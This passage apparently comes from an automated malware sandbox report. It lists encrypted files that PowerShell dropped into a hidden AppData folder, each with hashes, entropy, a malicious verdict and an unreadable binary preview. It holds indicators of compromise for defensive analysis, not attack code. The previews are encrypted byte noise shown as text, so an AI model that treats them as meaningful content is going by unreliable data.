Preview:	...\[.QYl..4.......Y.C..sg=.1.c..2.`..'?..(].j.ciR.$..h[..I;\|Ee.cD...q.t...{...S...u..F.z+... W._(D..y.....y.m.4.n.+...b..n.[..;...L..yOf6P..s...3.lR....0..,>....RzG.LqK..3.....j...}C5..IO..&s....nM.@..Ff..<.c.6-...]dh..A.<X...Z..\"v..x...:.e=..=.....Ck..)K..W.......M..T....B..I4m...6.,..>..."'U.,=dY.(.....a.oB..c...../..Vr. lt........z......SJ%5...t.).)V......x9.M..-+V..9!.'.....g.._3....P:..-....H.(..S...i....a.{.ksV....&.z...._..n.W.1....@/>.8n..}.>. ,y..Z\|......#.9.'.;j....P.H.z./.7...a.2x.\|/.aJ.I.V..sy5....}..8....@......z..i....$.-..\|.._....C=..^......x.....{.w.g.U-.h,f.U5l6k..G6..}3.E. ...8.././1._.)..L...p.]3...aQ..H....7N..<.uQ..kq..9;.;.".vV....H..;.....}.4.....x...E._...X...,^......z....9"..sMD.b..pS.$N.....3...4..>y%..t.5..3]..O..M..~..if.Le"J...{XRe.G.'O.XP.1..n.M..U$.XQKD...._...b54.NWOC...S...j.]&3F...T.=.N.....8..CO...B?..I^..l\...(l..^...%.>..{... QL...........*.I...8.D.....N.r.].E.2...?!..j..e.+3..DI./.@..lG\|2

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\rYBPRADkMLU.kPlZocvTwiNBDjyLr Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	85379
Entropy (8bit):	7.997988218775351
Encrypted:	true
SSDEEP:	1536:f362Kzw1RPdSgYQYwoo9o1Ax3UPGm8bboVbnLI8PIn3z:7R1SgYQCo9o1G3U4bbSlQn3z
MD5:	ADC0CC63F667D77E2DCFC9461FA9E4DD
SHA1:	154A50E6289CD0E0657E482FA0AEB0CB9E38D76F
SHA-256:	E23DBEC8244A58CC3B676BF76F45098CB0E6E501A768DA1F86621110CD3F4D82
SHA-512:	96441673366EF83206D5559D36725C9A82D8C87EFF4E2FB46DA02240B35E70D917D7E1DB23967D313E2D2F4E5F73B317A07EC94D1F5E19118A7C21A44B072A9E
Malicious:	true
Reputation:	unknown
Preview:	.h-..8."V.]e......=.%u...s.g.t..8..]...t.........>...N.8..p(....\|....;-.95....Y.{..5SN..e%...K59'.4...%d.Ya\|..Y..{...T...>.o.....S.K...^..%......#.(..e.o....t.t}m....hN...3A.O...lN.....hn...1w......P...2.gT...]&...)L..y.&}..\|...e...31_..../....Q....?....i&/..,oz.)qz{v@..I..c/x...Q%..&A.8........&(uZz.....I...U.r.I...0.B./zL._...P...3&Q..A~u....-.N.j%E.8+.!.....16..":.j.4.p..J}.8....k.V/y...u.].._.,..Vtj.0gJf..OZ.[.b...3.NxW.A/;.....o...N&..N.2%/V/..p`.......8.Hb\|zz..aQ.B.g.E1...,!&..Wj\|..z7...C....W.......^....8.';.s#-Z.s.m..ad...,.....z.....^4W=...7....'HN.;.&\..D.3..P`=/hx9[..\.Mq...^...3.#..E]..<..>A0.a...}...\|..:.7Ct<Y.....2..F.../k.."<...#...`..$`....9.Gq...w......6...^.....M'.*..G.RT8.goR.&T.5U...Dh.z...;Y$...l...2Z..$.xnc...K.\|.5W.I...B.T..>\|K...Y..ns..y.,.?W. ya[..OM.....;....l.H.;.......u.p....8...J...L.f..@.9U1y 8.\|W7.4.b.!....b@.1s.g...........c4.R...D.8E..zs..4G.nm....K.G+..Zb..x..}TL.Zu..^Y#..E.FG}.......&&.+...w.,s..@.&.@l..<....H

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\rcWsflZHpJ.nyVPuodLUXIFhrlW Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	75363
Entropy (8bit):	7.997240231887293
Encrypted:	true
SSDEEP:	1536:8/vMYSVslHtdHlBeLzdXrc6tEnaw124PXQTGvbJA8z+3duRBU:gSVsNtp+dY2Enaw1XgU1+3oRW
MD5:	717288C45C62E23384EA8107C66445CE
SHA1:	11EEF11E502545308494449DB38FF93A964B5760
SHA-256:	574B759601A6048EED8C30EE0F80DDDAFFBFE28C22586E5107DD75B13B53A189
SHA-512:	E7D25AE38B8CAA0A2A49E49CDF1451BFA0E7B84867DA2AD7E69702BFC5E746DA819DAFB0F7A5831EE87A9D67E90B5B7E091C47577B800C4A38AAAF89786FC7A1
Malicious:	true
Reputation:	unknown
Preview:	J.KE.....c.........m..4(E.}_...-.:...5..rF....j....~..57...~..o....q.a..W..jGq.}c..1L.\.0...2.b....3..f?...q'.X..>.Y~.@o...%...u...0..u.`./..i.....F ....}...A?../.%^(U..".b....wRK"T.T..=D......Y.kh...~.5.0H..<P..E...3.....8.(.;... V.C......).O.~.8..w w.[)....0fZ....E..c......&.,."...+.yv..U2.=....H...7.&.d...\|\9._ M...~..+l.,.V....J.j..K.....H....r.STU....U.%..P....d..X3t.............I..d&X.....R}.=..E/4`........G..V........9.}.Ok......np...6.7.b....)Z.t.N.....dl[.1.q....$...O......A-.u...{.....;.f1.t..}s.[sh.7.........0"..F-..tT..#......-5D..].2..Mt.......9.2.]..ft..}......;~...0-.6.00...n.a.0..i.8..k.....D&q.....5D...?.\|K..H..:^..m...$.\|H....-.u.4....qG../8..1Z...s.>.t..*..hx..D....V.GKM.........4.Xp.Uy..#..F._.;..@6+u.......MY.gE.CM4..$..O`E..........b(?d@m$.Wr8.i.....i.k....4;.h.. w..~v.\|.+..=..b.~.+.3..Qkf.1%w.i......G:Ol..N7....!..D.?,.Xp...F.nE.w.uF...2.../.X)....<......gg.....{a.t..C}u.t.)..}.J`....wW%__Q..==.......

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\sPLirWwDeIanjzQgMU.EnKFqSxUJNk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	187641
Entropy (8bit):	7.999100968317437
Encrypted:	true
SSDEEP:	3072:xUdYEqND4UolQO2NyyVQT6vb0W4zHxHcNKAw2r+H4AYOFMPImGH86soD2:xG9QO2NXCWvB4SKAw2raRFMAlsoK
MD5:	FB8BD2113A9D2605FC37E136AB77DF73
SHA1:	DBF46D40FF49570AC78149B3AEE0646D6A3BFB3D
SHA-256:	1B40346FD8FFE52E312378E5E859A2E7094B7923A048E40390CBB17A22E845E7
SHA-512:	CA09FCC1981AF95AB81174012127D85A96A07A37ECFF0C225DA1E33A49F3A5E21276E8F38973092057A0C525DAC13DCBC6779479A4035DB5765E5632CF04E014
Malicious:	false
Reputation:	unknown
Preview:	K.V....\D"W.\...M...}.>..c...s. .........Y.......S4..d..-.....h6...X.....'..d.s.ef.-}...=-......(".-oo.....?-.m.k.J.Y.&y....N.y..;.....l(s.6.B.\|....nS....T..D....`..u...=....i...k.:$.-t............."{2.(S.Re..n...i..>..yG uB,.....&...c.....&..&..........&d.........&....[.Noi..q...B.s.&....\$.E .r.m..Is.4..N=Z.J...=D.x..N;..K.....;..j.A.?...U....@E./~......4..fZ.8.5g.Ms.Q'.v..3GO.,@..B.YU....j'.....]L.,........:....R.Y...#....';q...tf.S........P.4C...i...s.....31k&->...WV}. W.Q..o@e...7.d8.....H)X.%..5....S,.x.-...`d[....nk..M.....Z.R.F....i...B..?....Ee...A...ci.K.R...^h.9.l...B.>......P@..~...}.G<...;B,4.Pz{.i$...\|=M%...h..-q=J/.C>5;r...D6..>.Y...........p.'./L.&.g...}...X)lb(i.H..,AC...C..".yx.s.Q...}5/!B.S..^....#.."E..).}...6...."_.y5.^....y<....p..c...S....A........f.j... ...F..........&..r.<y..G.....I.M.A..ip.}.....3..\....S....\|..V.U.J.%.u6...B..[.0.q...x.jm...8......t._. ....C. .m...t2:.#t.j....mxe.l..H.*........0MB

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\sqUrokuhbgcilCTvO.cKQGgLSVTOFqZAJRin Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	97795
Entropy (8bit):	7.998201351805171
Encrypted:	true
SSDEEP:	1536:osa174iiXKnCJBwla3A7oZog+Jo1xWeKb4+Skvp9T0dezU2NVA2uq5yFhfM:A7yaCYlQJ+bJrb4+lvp9TueY0APM
MD5:	4474AC371FE2952F3CFCA34EDF49A595
SHA1:	A5F63B43C71CCC957737FBD2CEE91D95B9ABA57D
SHA-256:	F7EAA1873EB4914B19E8789A23E8D60FC4259F83B6B48BCB52701157BA3CD3DD
SHA-512:	7D5B475F98AA870AADBDC6345DE8FA48AABFE5D2D203072EB2353753C1D64CE98EF8796CF8F4EAE7E1093602E4C5749C223A5BA3A87554BAB53C02A6145FC04F
Malicious:	true
Reputation:	unknown
Preview:	@._>...8.....A..T[.,..v8..hk........V..hQ.C.rd\..H.....]....k........n.`8.p.3b.^.xE...{.sQ..".K.V..Z.^C...,.2.....C.=.9#..g...%7..y.P=..N1I..']...9..v7.A...M.vM.)..y..._$..6.........#8y..t^.{G..n^NI...ZB..EHB.S..n.......4}.H..7:..<n..'H...3.bx.....P.X...}........y.....b0..g...u@..;..)...i.o...%....h\Qc.o.F?..c.0..#.P..p....0A,"...ox...V.z....S.S..k..4.............'>..d.^v...3W.M.C....Ku.6....YW...%L.k.A...fU..=`.&.rh..'r.....U..](7m..^gK_V.U^rU.W1.AP6i..Y..w....om..v:A....G.](..=$ra......d..F.J..O....54..g..~;.C._.b{85..G.E9.m#x:]..,.K.V..8)D.Z.....w.OD.......[.U.}.0H./.Q~...1..a.b._..UW'...f..#.X..>.......a...\....s..`M...@...l..v...Z..[1..Cd}..H6...~_....i.>.R.dF3..W../...x.IMi...Jx...6.C.........'..O...X.......mm...#.....\.........zo.1.....3Z....ek.Tc..$......>.[.J....Ic..T....{Y..D....$N..e'....Gs.I`.\.}S.v..w.d....h.....T.U.h....^^].e6..r.@..bfU...z..........o..>Vh.Z1^.4.k......Q.....g8.....f.$..f,....F.A.K...s.W.......K..m..&y.#

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\tBYGhoHrEVXlsUxcRz.GKesNkcIQFOCJ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	87005
Entropy (8bit):	7.998006720761468
Encrypted:	true
SSDEEP:	1536:6YR+18b9tmQHs20y8C50oVL0gwKzGEbdLnOF4kgLJe2iwQat+Hu+c+4Tqj:6YRrzM20y8CzzzGEZq23kv
MD5:	809E8534B08956B3CC99C9AC1D54E825
SHA1:	549999F1340BE29342008A97A60F44DC78292075
SHA-256:	6F4690EB5AEFDF63E267383B78E679D1B78AD62259D9729F4796126FDC9973FD
SHA-512:	602770BC7893ADC52B1FAC632068AFC4EE3A95088094137D6B8880B5A0A3E966BD4E250D27BE34FA494D553DFAF1756D4B83D086B5DF442CCF8C69114CAEADA8
Malicious:	true
Reputation:	unknown
Preview:	E....u.Tu...@.....N.I ...A^."JR.U....r....y..9V..`...mF5B.....y\|..M.B$..b..U.....`..]Yjz.....7uH.......;.q.a..O....?..z.A.r..E..{Y..y........J;..K5.GwxM6..#j[o...N.[. ^....8.]...`...U+.F....N=.2.8f%....Y.zE.Z.jFt./&.UT.....`.....h...nz.E.4...7.6.P....#.mE...~..^.$..._..+..(C.(...d.b.....5t.....J....F.v..^.)\|..v..[ms..)Ri/..8.....sJ.%.-......l.NU.....i.\.{./e.......6.F..p.K..v$..os.......Q.S.#..i.?....V..H.....l.P.V..mF..5.'(....j....UUD ....#.:........>3\|9t.7.......{..m......m.^...Y..a....Hb....k.6`.b...U1i...;.!........b68....(..oV,J.ppPH}n'..G..-\.-.}.d..^..1....k.s{jb.S.6:.............w.BAL.n...9...rt..g..3...\.....QQ..y...a....!6d%.O.uS...?.I."..G`.o].......:....?......"...y.......].B..u:....9....J\..;....../.a...t...6...p...?.....y..".$........Ad<z......l....o....Q.\|q..65..{....F.{...W....9.....1.!.o.....m.....).V.!...]..p.+-....G...)S..h.X...{.H..# .._..@'..@p.Uj8...LK../....%...s'....lzoj...M$I....q...MR..K.. M....h..+..M..d.C.....

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\tQUZgDbHKG.IAhemCJNfU Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	72451
Entropy (8bit):	7.997598832573961
Encrypted:	true
SSDEEP:	1536:leiUW32dcn+TAKEYdDhovc9BjRKMEyUINjjU1dUG9:leiHl+TAKnDqE9tAM13odUE
MD5:	483793EEAB48B9B9E2C1C279C967B49C
SHA1:	6AC27812C0907F2D7B5C86D9AFB8CA9A514A0A24
SHA-256:	09EC29C35263C5314DE40D35BEF0EE17ADEB233DD1FF2D821FC60B3F3620CF4A
SHA-512:	503C7B12AB8DDCCE1877BDE848869A30C0B7608793973A420EB4A4FD532776CD263CB869652BF36F13F34FB02525A07DD1BE0DFE89D8F4C58273C71051BAE06E
Malicious:	true
Reputation:	unknown
Preview:	Df.>N...4."Ed...Pl..\|.O...[.....vdCa&H./e........)).P?.G.<.y.ly...ns)$.x....-.U..~.&%,.z..u#v.......08KWh...#..\|....AZ...x}.h.5\.@.._......?....z.1.UI...m.....De.....m....0..../..h...jf-....#.,.....X.....<..........1Z..T.z....L..e..V.-`)',R..NG/p...o.......8f....).{T.g.0...X.....aa..?.iUE...m. $s.....>)..N.-ud7..+......?.J....3 ..H...[_.'........$v..R.gq....AD%.;..U.3E..7...#.U...A2.n.^...Hd....1...K/.P....H........yj,j....g..i.$.k?>...d............j.\.Q.o2c= ..N....A..j..K..,...r0..<..x2?.,....T4...uc).....On.b.(.....J.>.l9....\|{.P......,.rK}{..O.I....%~.......3...EpU....6.-....P..HY....=..YI.......3.3Q./.'.e"......:..i.y....o..\...%Bq.f..W7.+...>.n.....n.@7i..\..:....Tb!a+.D...V..........O..0q.V..vuc.9B.....d...&.;..-T...G...I!..Nx..R.*.......#JD...\|!..)...)...Y..v..5....s..}.C./,..n..0r.c.9{...W2.?.Q.)B..h.kP..)...I...5b.6_..&..qD..,......':R..,.......J..(d.EU...E.S...M.P.s..^.N...y..[...d....m._+.>w.}.T. .H.d.B..k.F...eh..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\tYRpUHVraXAkgZdPe.BiHbIpfJXdEFx Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	101708
Entropy (8bit):	7.998509859422991
Encrypted:	true
SSDEEP:	3072:QHqfj8hbjW9g7lhiN1uuQJr7gXHEFFQjHk6H:5rwbjW9Yl8NnWfCTH
MD5:	BCD71612FCF9F7DF8806B0CFA3EF4E30
SHA1:	D7E368DB262742714226FA6ADFF1C748BF2BA936
SHA-256:	7EBBF1DCBBBFE9CDB2775F71C2E32FD950CBE38C265893BAB235FA6D70631C84
SHA-512:	D12CCE2784AC69F2651FD4105406F64B7B2BA151AC5CB5FFFDE1A8E0BB4ED55A89F637C4055CE88A0F7B39B84F1A0EDC7950B8892F5EAF3E7780031008FA7B2B
Malicious:	true
Reputation:	unknown
Preview:	KF...@l........w=4.a..?..".%.P..zo(...G.~.f.)..0i9.^....C]..h..Zk4...~.1.X..NZ.....e+.a..Kc....y.Y`>..m.........@S.C..I.i...B....@.as.i:..+0...9.i.W.Z.`......@...H..]....>b....\.=......~...%.0.Z.Z..C. ..!x..bb.`..W..E.[.>3.S1..[LIP^..D..!..I^..Ln..H}}>..m7.F.M....@/...$K.....M.....v....hBBH..>....X.....5..4.G...G..7.I.s..L..j..Nr.Z..VKX..O..B..CM.....j....`.e.x.oTe...E{$.......A.c..sC9l.Z<...j..j.k....[..T.n.:#@...!ft....:.....07..DF..pY.n.v...U.+.H<.... DJ.,...M\|....\....t.?..+......,..Bj.xJ..5..0.&./.{..rV..n.......m@...}...1Q.D..TOL.....3...r~[.2...~...P..%\>.2.....E.,}Z..G.).@...C........s..?..<9w.o.g.;............"Fh.>......Y_.^....&.v.....=7Q......c1Z..l.j..G..........n......k...y.6........m5...nVx..oe..I?."/.<x./....]H.+*....z.....@b4_h..s..0.b...c..e&...B]C...x...jm...n.........z.p...%r.....$.._....P....U......~...`.....B...gO......$.\|.U.....Ba.{./39.me...3......l..m^?.$.vw...X.PZ..k+..f...j8oIre.[...I.yR].#..K.>..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\tYhnzMpqUKHyQ.NxkVtTiMFho Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	172405
Entropy (8bit):	7.998839792799651
Encrypted:	true
SSDEEP:	3072:I1iUySn//LgE1aTUfS7auYLoOLPerNEIAfYZTwoS9hSzcbCr:iPySn/soaqmYLoOLGinfYZTwZEeU
MD5:	08AAFB6FEAAADA88A5527573B79A585B
SHA1:	1335F99E0A01F8E430FD98F97BAFA498D991EA81
SHA-256:	0443E205D07CC20A6096A00ACF767F5611ADF8EC8F1160C2FBE8A97C5BCB7DAB
SHA-512:	662FBFD568AA608B71E4B58D5D5D2443331EA1E0C3E9D035099D9AF11BE7C59AF7A3AFECA79317AD0D1A9E9EBE360275AB3016FA4483671C1C2AC1EAB71CAC5A
Malicious:	false
Reputation:	unknown
Preview:	. .O..yl......#....tDZ..h....##.....`.....O.%...@.......gw..O......G.%}.E{.9......G...1.......i.M..+.^....p...t....8.....Bf.pgX...+...W.R$1.j.....#..o...YjI.L..,.gu.,..BUi.ch..uH.H.>.9]...'....(..k.TRl.A...ff]...s.{.-..<Xq5.c.:."Z.....s2...f.9..C..G>m.......+.;I....y...............Jp........9U.S3.C.b!.F.L..`,a.{'...j.b...}OY0.......?.J.2...,....V.Yuh..E{.S..m...Y..r......".d...:.NHxv.M....8....8/..[......S...1...d....{.Cu...V..\|.nr...eB..{F.U....w.9.cd.^.~`]X>..c.I\.8.r....B.9.z.....rB...w<8".g.q..S...j...;.$..nX...8...Vj..g......`L....i...L..x..2G.8...._....{`.\.c"...?.n....JD..l...%..y$..~FK.'....LB.iC..y.i.Q......l.H..y.d../.. Q>$...>.y..,8~.Y.x!..`obR_.<. 9...\|q...mh.D.A-ne....A......DXS..J.....}Yq.......U..;....Y .(.h.....Vh.....p.3...w.w.....I.K.s&.....Y..BY..\|9E..6Y....F.......J<PO.>....X.Y..-...s<...4M<.V..+.f.+.X....exN.wn..O\|9w...U.kd.[....%!\.54(N..c.....}.h.N.g2.,j....QM...G.OL....R.....M.0......D.@.y......cd..t

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\tohABNiMgKTCJxR.HKQkSJTEwoOV Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	183063
Entropy (8bit):	7.999094191819183
Encrypted:	true
SSDEEP:	3072:fhUs2K2Io2/wKSdzpI/acfAqUgUbDgLIzhC8wC7Phqn5BsArnMmK8VbhNpzApKS:pQK020zI4fgUvgLIC8wwsfsArMoVbFy
MD5:	F2F706D9D2D7D780E6C187F397AF194A
SHA1:	32149076010498888C1AC0AE67E193452A6E2962
SHA-256:	A9CFDE202A23FCF8253A781AED1D576DC8E1F537E609A0230709E7386BF23FEE
SHA-512:	89A3185CF638F116C4215A8F84283262C53B56B345AF268886087FE2335A1FA5C6D09688076E217DE73E45CCD1DC2793F46720CBCF5A5B5CBD699065136A5A29
Malicious:	true
Reputation:	unknown
Preview:	..0.mrx..p.m,...hS...Lyf..=....}.DF.....0U....u,......z...lfW.Z.Enx.A.I..il..\|..< ...b........(..........z.x..[..._.\..f...'..\|.e{u\..$,.....#Izf...S "....N...=.R.>...{.2KUb/X.dK...fgEXV....#.3H....gafd ..m.t...]....=@....R".F.rXeY.y.Go..Q75.f.g.Q.B%.'.......&(..W.$.^Y..p..\..../3.2..y5....3[.MC..+...9H..h&.s1Y.].v6..mpw..ah...w&7.Kg..........`.t.....sT[u....wM.....}..;...$...%7j.....]..\...{7.....Y{.g...6.:.r...1e....c.....-....%-..B'..dX.m..,"._.@.}..J.Z.....8...[!P..G...3..k.}G.)HC{...y.B.P.`....>W^.6.+d..Zy...'..Y&~'Xh..bK..gp..?..%..OxM....Fy.RX5Y6....0;.x...E.....gJyY.....;..'..hn.tQ5w...1i...0=......`Y...8...H.Lh.e...y.<..i..b.Y..I^....z...!.3....\..zC&...3.-....gKU...9......8..M..F.$......n.1..+....5.O.j.."..)..~Cu........V.v..D.$}Up...6.A.D.u.~.q...>......%...".=)...j..V.A..U.m;4..?.....}..+w".7f.).A..?F...2../.f.X.pB0....+J....KD\|.a..rr6u...P...9.h...1.0..g.....^tA.....C.,.N.:..p..Lwh0..W..sZ....=.<.....1.?..0........-.1+.z;.x.b.3

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vOylFaWPKUgoLNRir.NqDeflTGdpJPis Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	74868
Entropy (8bit):	7.997293559028457
Encrypted:	true
SSDEEP:	1536:w/mWAjapUeJTj21mD6wdNPNVNXCs003SnvftbNYV/bfznWAabY:w/B/iK4wdvTd06SNhYFzqY
MD5:	34753D086AA0D22ECB1B503993729216
SHA1:	D6B11BC4637207F09C9FF73AF27151A819C1E3EB
SHA-256:	42F941BCBB849238F1FDF6B7B0945254DB0DB313BD93333B08233C83C2C1BC82
SHA-512:	74297DFA0F4191B6FA7FE9D4C65C0B6C33F4DD856483C52EDCC705A514C83537047DF59DE46696101C220BEE8913AF65569394AC0383CFB629B0718F5342085A
Malicious:	false
Reputation:	unknown
Preview:	P.w........UBTk..'..g..a.a.V.-..p.w..!+VDkH...8.-.....)q..G.O.V(u<..K.K.;i..........1_...\~.^.D. 1..j.%.+^N..W@e.(.f..C.6.E...cd..Q..:.r.U.......6?.wx..x;y....^.W...Qq.s&.....#...d2....2.Q&$.O-..G...&\|.1Q..(....\|.$.,..[...OdGb.x_...Y. .p'...w_.Ep......\l..\.5.z%{...'...R..DC..VgC..........T.:.m...._..;..(.....7.....O/9.a}T.....~.L...Y.E..:.'...I.&......... .S.$..>............t......nm....ra........6.";...2..A...oUh...{s.R@.)...v..~.2qy....~..;0y..#..........v....".y'Y...a.F..irt.`k.x..n.fU_.\y..3...`.Y......UA.%.0.2...0.s1.t..?..`......dqKa...6.dRZ....Mba{.L../#..?.Et....U.V.L...!x....q.$..D.n.....b\|B..B..$.............2.f0;.s.S..6...M.#..z....at.....z.......;hs..*01..]PvM.k..S....v....Yc...>yP...1C..b.q- %4.9m.<..p..V.#..DG.....^......3/.\....R....k..r)......~.D..z/...$k........./..xe`.)). m.Ui}v.>.../.b..B..[j.2.p4.g.{.J.YN._....g =I.....;.%.....H\GFL(}EG....SO..{.T'...I..].....gQ@......Q..... .yn.@.... .w:.){....`..$J'..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vTgAziQfESIk.jegVNzmiKyCGMbOp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	69401
Entropy (8bit):	7.997405880167159
Encrypted:	true
SSDEEP:	1536:11Nv5JnX1Tb1Z2w5RfEXJPKP0MIqdnTze7w6zkD9auzSvrEJXc:3Nvf4ER8PK0qp27FoD9augcc
MD5:	33086168C3CF81D7F685306EFB76142E
SHA1:	58F929CDCF4526C6C55AE0C9040CE3F75DBD7963
SHA-256:	3B792930EB86AE148FBBC08449930ADDAFB266D599ADBFFFE90E86F731B94615
SHA-512:	E1C4A7A5A7C3C0D8C7889D86394689CD8925A27ED5BA0310F00EED7E2052CCF29A984BA18FE3280395A9D51099CB186093688CB5737F33998BF5960A3D217AAC
Malicious:	true
Reputation:	unknown
Preview:	..q8.H..F(G....V.o.p...,s..].=5.6.]-q.t\.4\|4.i..1.C.......:..........#.M...TO.('.5...3q...s........%..)...;.w..l.mHp..>a.N.%..f..\|S...1{.+..`.6f.35#.X...+.o...]......<.k...o.I.z.C.2.;n.\|..8.P.;..a~...E+..%.xO...").b...j.hA9.....[.E7..C...}.r5.......'!..0.....`C....2................4..a..Q$!]._/w.@-P..GE..:....o.G....l...~.......9..-...yb'.'.u..~..2....}.sdC.b..........Tt...Q..[..(Qb.v..5z.Gc..P...M.;.7..!...m...f;!.}.O...H...U.qE.ik.m.#....X.W&V...2<..A$....h..(.yO.y..xt.w.6a=?$n..k..I.$.jm../....H?A.k.)5.+.N)...@7.z....g.y8G"..6..,t7...[B.Dp&.a}...~...z..e.G..2....Q...3AkK...,....2f..4j..6..T...yX+...Kb.....9HD:n.>.....8..-.H.=k.h..W.%.\|.M..;......\.D.y).5no.i~..l.u.$..X0.~.s].....V...-}....:v[c..ki.>,...t).q.`..0...z..K{.D>..b.5F.......T..QU+xF`..(......>.5...&r..DZ.q.Q.n.%....oqkD..g..w.B9.+*..../../p3B.r..>Zn......mt\|.=..]...7.@t....%.s..E..rpD.}.....a...w..u..)...T.}....'..].1.K...#..A..a1.(.Ikt.=.1..T.9....[.).4c.)JJ..-.(.)..AAhY...M)

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vXYeRLjNGzAqHy.eqHltJEfVITuvOswM Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	198302
Entropy (8bit):	7.999012704425586
Encrypted:	true
SSDEEP:	6144:YOmxYitOK54DmFwgDcJF3gCmKl1N8aNZDuaYLoT:qxiK5JFwgcJi0lA0uayoT
MD5:	9404FC62EAAA3D7CE895D8FC34A5EC18
SHA1:	B220CFE0ADA588BD5DF4E4EC0BD531E4A64F08EE
SHA-256:	B97A59025DB9F69F9293C43893ABB0EA041D19F78DA48399CB7B82AA1F4953F0
SHA-512:	C86419150B93287F6FB4AE5A0B1F24012B3E20943872809A9F4FDE17C2101CF26587D7B504DFEC53918AB2575EA690CC5660437CBF192A24AC35CF2C772ADBC5
Malicious:	false
Reputation:	unknown
Preview:	S'.....:.l..0h...]^.....y....M..5...n.#.g-0C.........6P!a.gi.k..[..F.j.@..X....T^.,\|...nLB.....j.q.-{..Y.?n........^.~.4.w..C...f...^/..L..v...~.Lf.j.Z..]g......!.%<b/....a..W[;~.@..5..T.P.m..Y..7..K.A\|.....&.]..bg..2J}..$;..QGG..V....`..a.<:....b...uMx.{..Z.......I.o.1.a..9..w.U'...!....(."...{uk.Y..P.g.l.5.j...s.b.glkx .i3K..Z.3....Q....'...\...3..kpuD9....w....E.....lQG..V.(.2F..n.....<.ya!#..@w0K.x.(Y.....{0..rz...`.Co.........~.(T.K{.....08CWD.es.-..BB^.U,v%..j-J&..e.d..L5..gHEQ...R.zJ.?.<..........0.g... ...x..:+....u.N....6'..^5..y..O..I'.A.....3...$..~...+...v.k.SJK..X.\>ZEz.^....T..F1.5...%e0.%.O....k$..0....].......\1.......J....D:!}m....0...!1.46.o..R/..sN..p...s.q.....#B.Nh.N..4m.....r..A.wa....C@..j.[...9."..eR..8N.<'.DT:..}....}...8=..A..1......{B)...nz'......8.~nr..8.A_..u..9:.lM.q....\Bq#..;...\|...Mr.s.#;./d.N.b...s...<X.:.`....X..aK...[..O^.)..3}lN.........R.s...gX..K...(...O)MN..0..k..f..c(r.f;..!b..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vcXEMslgBxyqCDi.yUtLlDFGzXnIY Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	95802
Entropy (8bit):	7.998186621157912
Encrypted:	true
SSDEEP:	1536:uN7sPMDMATgqmHPv/vkam0Avtl9ARczTkLXB4UPstIkdtX/7tSH:FEDMLq6XXkambTAczQLaVrSH
MD5:	AC2031A97213DFE8042D9C4E3873E60D
SHA1:	6C3EE6F9ED7071996D74DB407788069776F793B7
SHA-256:	0A4A18A1B48FC9A867DACA678BD554FD513AAA1414E6CEAC887783FDF9C51423
SHA-512:	3B67758B0C3C5FC81B4ACF56F00479374163FC1AD3AA14F4BCF76DB28AA46A01D26CC43AB04A469D662AABC7126DA7323311E2305F942391E6B8B946B5DFE3A0
Malicious:	true
Reputation:	unknown
Preview:	.\|4......#...;.I ..k...........y.[c.y..f\...o=.....Z...U ...'Q....,-...S.....p..4.(.....$.2G....]..!..+K.y\|...'.A)% ..M.....=nX..sv~.Q..a)f.h5= .r...>4...b..Y.$...}.}R.....z.....5Bb$eF...[.lI.p....d.HM..5.49..[.Lm.Xr6..&...l.{..b..M...0_z^-M.z.o...'...!....'...Ln`x.B.)..>.1.Py..;...3..g7..=....../.....).....?..p.f.D&..h....A.j.V.O.....~_..L1'.7yD...c-'m...'.O}....f..c.\@..nk.;..b.Lt!X3..xW.2vf.7....).#H;.{.h.....\|....^.v.v.T...B...P..5N.....[.H...........'`..\./+..z.NJ{$.}....}.....CX>'[3.n.......:l2}^1q.x.m......:..LS~.u.@...c5%C.~..q....).`LT....7...b.%1..).....+Q....H....K.\s.U..4.L. <..T..[(R9.Mg.%q[x=.=..a.vca...f.If..n.....j....Q.cX..8.E...4A'S..j{..`.)C;B.9...[...qI.q.(....Bd..R).cs.....J..O..2P....,.e.R...D..U.mB.DB..{^.fQ........ 